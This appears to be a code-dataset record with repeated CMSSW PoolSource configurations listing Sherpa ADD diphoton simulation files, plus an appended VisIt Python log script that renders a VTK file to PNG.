'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_16_1_Kh7.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_17_1_Gt5.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_18_1_Bvh.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_19_1_6KB.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_1_1_uAS.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_20_1_8Ra.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_21_1_l0p.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_22_1_rCA.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_23_1_Ec0.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_24_1_NtE.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_25_1_QNK.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_2_1_kmn.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_3_1_LIi.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_4_1_Q4Z.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_5_1_ap1.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_6_1_KyS.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_7_1_FQo.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_8_1_MdF.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_9_1_NrM.root'
))
<|reserved_special_token_1|>
import FWCore.ParameterSet.Config as cms
source = cms.Source('PoolSource', fileNames=cms.untracked.vstring(
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_10_1_Kji.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_1_1_oTR.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_2_1_A2c.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_3_1_TNY.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_4_1_F6B.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_5_1_L2p.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_6_1_vz3.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_7_1_c3E.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_8_1_w8E.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_9_1_FNA.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_10_1_KF1.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_11_1_4q7.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_12_1_aQ4.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_13_1_Pwh.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_14_1_1cS.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_15_1_dnc.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_16_1_Kh7.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_17_1_Gt5.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_18_1_Bvh.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_19_1_6KB.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_1_1_uAS.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_20_1_8Ra.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_21_1_l0p.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_22_1_rCA.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_23_1_Ec0.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_24_1_NtE.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_25_1_QNK.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_2_1_kmn.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_3_1_LIi.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_4_1_Q4Z.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_5_1_ap1.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_6_1_KyS.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_7_1_FQo.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_8_1_MdF.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_9_1_NrM.root'
))
<|reserved_special_token_1|>
import FWCore.ParameterSet.Config as cms
source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_10_1_Kji.root',
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_1_1_oTR.root',
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_2_1_A2c.root',
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_3_1_TNY.root',
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_4_1_F6B.root',
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_5_1_L2p.root',
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_6_1_vz3.root',
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_7_1_c3E.root',
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_8_1_w8E.root',
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_9_1_FNA.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_10_1_KF1.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_11_1_4q7.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_12_1_aQ4.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_13_1_Pwh.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_14_1_1cS.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_15_1_dnc.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_16_1_Kh7.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_17_1_Gt5.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_18_1_Bvh.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_19_1_6KB.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_1_1_uAS.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_20_1_8Ra.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_21_1_l0p.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_22_1_rCA.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_23_1_Ec0.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_24_1_NtE.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_25_1_QNK.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_2_1_kmn.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_3_1_LIi.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_4_1_Q4Z.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_5_1_ap1.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_6_1_KyS.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_7_1_FQo.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_8_1_MdF.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_9_1_NrM.root',
)
)
|
flexible
|
{
"blob_id": "aaeca18f3771a6032c0fe51b75502f730c888888",
"index": 9383,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsource = cms.Source('PoolSource', fileNames=cms.untracked.vstring(\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_10_1_Kji.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_1_1_oTR.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_2_1_A2c.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_3_1_TNY.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_4_1_F6B.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_5_1_L2p.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_6_1_vz3.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_7_1_c3E.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_8_1_w8E.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_9_1_FNA.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_10_1_KF1.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_11_1_4q7.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_12_1_aQ4.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_13_1_Pwh.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_14_1_1cS.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_15_1_dnc.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_16_1_Kh7.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_17_1_Gt5.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_18_1_Bvh.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_19_1_6KB.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_1_1_uAS.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_20_1_8Ra.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_21_1_l0p.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_22_1_rCA.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_23_1_Ec0.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_24_1_NtE.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_25_1_QNK.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_2_1_kmn.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_3_1_LIi.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_4_1_Q4Z.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_5_1_ap1.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_6_1_KyS.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_7_1_FQo.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_8_1_MdF.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_9_1_NrM.root'\n ))\n",
"step-3": "import FWCore.ParameterSet.Config as cms\nsource = cms.Source('PoolSource', fileNames=cms.untracked.vstring(\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_10_1_Kji.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_1_1_oTR.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_2_1_A2c.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_3_1_TNY.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_4_1_F6B.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_5_1_L2p.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_6_1_vz3.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_7_1_c3E.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_8_1_w8E.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_9_1_FNA.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_10_1_KF1.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_11_1_4q7.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_12_1_aQ4.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_13_1_Pwh.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_14_1_1cS.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_15_1_dnc.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_16_1_Kh7.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_17_1_Gt5.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_18_1_Bvh.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_19_1_6KB.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_1_1_uAS.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_20_1_8Ra.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_21_1_l0p.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_22_1_rCA.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_23_1_Ec0.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_24_1_NtE.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_25_1_QNK.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_2_1_kmn.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_3_1_LIi.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_4_1_Q4Z.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_5_1_ap1.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_6_1_KyS.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_7_1_FQo.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_8_1_MdF.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_9_1_NrM.root'\n ))\n",
"step-4": "import FWCore.ParameterSet.Config as cms\n\nsource = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_10_1_Kji.root',\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_1_1_oTR.root',\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_2_1_A2c.root',\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_3_1_TNY.root',\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_4_1_F6B.root',\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_5_1_L2p.root',\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_6_1_vz3.root',\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_7_1_c3E.root',\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_8_1_w8E.root',\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_9_1_FNA.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_10_1_KF1.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_11_1_4q7.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_12_1_aQ4.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_13_1_Pwh.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_14_1_1cS.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_15_1_dnc.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_16_1_Kh7.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_17_1_Gt5.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_18_1_Bvh.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_19_1_6KB.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_1_1_uAS.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_20_1_8Ra.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_21_1_l0p.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_22_1_rCA.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_23_1_Ec0.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_24_1_NtE.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_25_1_QNK.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_2_1_kmn.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_3_1_LIi.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_4_1_Q4Z.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_5_1_ap1.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_6_1_KyS.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_7_1_FQo.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_8_1_MdF.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_9_1_NrM.root',\n )\n\n)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Visit 2.12.3 log file
ScriptVersion = "2.12.3"
if ScriptVersion != Version():
print "This script is for VisIt %s. It may not work with version %s" % (ScriptVersion, Version())
visit.ShowAllWindows()
visit.ShowAllWindows()
visit.OpenDatabase("test.vtk", 0)
# The UpdateDBPluginInfo RPC is not supported in the VisIt module so it will not be logged.
visit.AddPlot("Pseudocolor", "scalars", 1, 1)
visit.DrawPlots()
SaveWindowAtts = visit.SaveWindowAttributes()
SaveWindowAtts.outputToCurrentDirectory = 1
SaveWindowAtts.outputDirectory = "."
SaveWindowAtts.fileName = "visit"
SaveWindowAtts.family = 1
SaveWindowAtts.format = SaveWindowAtts.PNG # BMP, CURVE, JPEG, OBJ, PNG, POSTSCRIPT, POVRAY, PPM, RGB, STL, TIFF, ULTRA, VTK, PLY
SaveWindowAtts.width = 1024
SaveWindowAtts.height = 1024
SaveWindowAtts.screenCapture = 0
SaveWindowAtts.saveTiled = 0
SaveWindowAtts.quality = 80
SaveWindowAtts.progressive = 0
SaveWindowAtts.binary = 0
SaveWindowAtts.stereo = 0
SaveWindowAtts.compression = SaveWindowAtts.PackBits # None, PackBits, Jpeg, Deflate
SaveWindowAtts.forceMerge = 0
SaveWindowAtts.resConstraint = SaveWindowAtts.ScreenProportions # NoConstraint, EqualWidthHeight, ScreenProportions
SaveWindowAtts.advancedMultiWindowSave = 0
visit.SetSaveWindowAttributes(SaveWindowAtts)
visit.SaveWindow()
# Begin spontaneous state
View3DAtts = visit.View3DAttributes()
View3DAtts.viewNormal = (0.264045, 0.220135, 0.939053)
View3DAtts.focus = (1, 1, 1)
View3DAtts.viewUp = (0.100817, 0.961974, -0.253856)
View3DAtts.viewAngle = 30
View3DAtts.parallelScale = 1.73205
View3DAtts.nearPlane = -3.4641
View3DAtts.farPlane = 3.4641
View3DAtts.imagePan = (0, 0)
View3DAtts.imageZoom = 1
View3DAtts.perspective = 1
View3DAtts.eyeAngle = 2
View3DAtts.centerOfRotationSet = 0
View3DAtts.centerOfRotation = (1, 1, 1)
View3DAtts.axis3DScaleFlag = 0
View3DAtts.axis3DScales = (1, 1, 1)
View3DAtts.shear = (0, 0, 1)
View3DAtts.windowValid = 1
visit.SetView3D(View3DAtts)
# End spontaneous state
|
normal
|
{
"blob_id": "6d0cfc9d5bbc45bfa356c45a7cdb9f4822b03e0a",
"index": 2983,
